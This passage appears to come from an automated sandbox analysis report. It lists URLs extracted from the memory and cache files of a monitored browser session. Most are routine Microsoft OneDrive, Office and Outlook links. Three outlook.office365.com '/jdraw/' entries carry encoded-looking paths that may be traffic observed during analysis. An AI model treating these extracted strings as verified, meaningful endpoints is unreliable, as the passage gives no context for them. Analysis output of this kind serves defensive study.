            Source: 52-478955-68ddb2ab[1].js.6.drString found in binary or memory: https://office.live.com/start/PowerPoint.aspx?WT.mc_id=MSN_site
            Source: 52-478955-68ddb2ab[1].js.6.drString found in binary or memory: https://office.live.com/start/Word.aspx?WT.mc_id=MSN_site;Excel
            Source: 52-478955-68ddb2ab[1].js.6.drString found in binary or memory: https://onedrive.live.com/#qt=mru
            Source: 52-478955-68ddb2ab[1].js.6.drString found in binary or memory: https://onedrive.live.com/?qt=allmyphotos;Aktuelle
            Source: 52-478955-68ddb2ab[1].js.6.drString found in binary or memory: https://onedrive.live.com/?qt=mru;Aktuelle
            Source: 52-478955-68ddb2ab[1].js.6.drString found in binary or memory: https://onedrive.live.com/?qt=mru;OneDrive-App
            Source: de-ch[1].htm.6.drString found in binary or memory: https://onedrive.live.com/?wt.mc_id=oo_msn_msnhomepage_header
            Source: 52-478955-68ddb2ab[1].js.6.drString found in binary or memory: https://onedrive.live.com/about/en/download/
            Source: 52-478955-68ddb2ab[1].js.6.drString found in binary or memory: https://onedrive.live.com;Fotos
            Source: 52-478955-68ddb2ab[1].js.6.drString found in binary or memory: https://onedrive.live.com;OneDrive-App
            Source: 52-478955-68ddb2ab[1].js.6.drString found in binary or memory: https://onedrive.live.com?wt.mc_id=oo_msn_msnhomepage_header
            Source: de-ch[1].htm.6.drString found in binary or memory: https://outlook.com/
            Source: 52-478955-68ddb2ab[1].js.6.drString found in binary or memory: https://outlook.live.com/calendar
            Source: 52-478955-68ddb2ab[1].js.6.drString found in binary or memory: https://outlook.live.com/mail/deeplink/compose;Kalender
            Source: {61C46D29-DEA1-11EB-90E5-ECF4BB570DC9}.dat.4.drString found in binary or memory: https://outlook.office365.com/jdraw/AsyRg_2BVSdI/XmsSORBsoAL/M5uOi2ty5xn2OE/ER18j8gGrXEoZA_2FCM38/1O
            Source: {61C46D27-DEA1-11EB-90E5-ECF4BB570DC9}.dat.4.drString found in binary or memory: https://outlook.office365.com/jdraw/YV9_2BRIFh2A/q7dpbh5Wtee/h9DRSfahzOVkbw/8nj9JvAX9J0uIFu5B3_2B/oU
            Source: {7E89C2AE-DEA1-11EB-90E5-ECF4BB570DC9}.dat.4.drString found in binary or memory: https://outlook.office365.com/jdraw/vqfQiI7wHQRYBipo/2YRO_2BiyLl_2Fp/6B0k0PRCnXIV6OmEu7/x1gwiJ0go/pe
            Source: ~DF5F04A478F43FE59C.TMP.4.dr, {61C46D25-DEA1-11EB-90E5-ECF4BB570DC9}.dat.4.drString found in binary or memory: